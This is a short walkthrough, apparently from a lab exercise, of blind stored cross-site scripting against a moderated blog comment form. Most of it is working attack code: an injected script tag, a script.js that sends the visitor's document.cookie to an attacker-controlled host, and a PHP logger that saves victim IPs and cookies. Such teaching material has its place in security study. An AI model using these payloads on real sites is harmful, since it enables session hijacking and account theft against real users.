OK, well now to put it into practice. We have a security blog in front of us. If we scroll down we have a search feature. If we click the link for the blog, we can leave a comment - it has multiple fields. I think I'll start there.
Leaving a test comment, it does give us a preview of the comment but it's moderated so we likely won't get an approval
OK, well let's start with the PHP server stand up on our machine
mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 10.10.10.10:7337Looks like we got a hit on the website field using this code:
'><script src=http://OUR_IP/website></script>
For the data grabber, I think I'm going to use the website one so it's less obvious. We'll save this as script.js:
document.location='http://OUR_IP/index.php?c='+document.cookie;We'll then use this to inject in the website field:
<script src=http://OUR_IP/script.js></script>We'll use the example cookie stealer logger from before and save that as index.php
<?php
if (isset($_GET['c'])) {$list = explode(";", $_GET['c']);foreach ($list as $key => $value) {$cookie = urldecode($value);$file = fopen("cookies.txt", "a+");fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");fclose($file);}}
?>We pop that form and we get our return - sweet!
Comments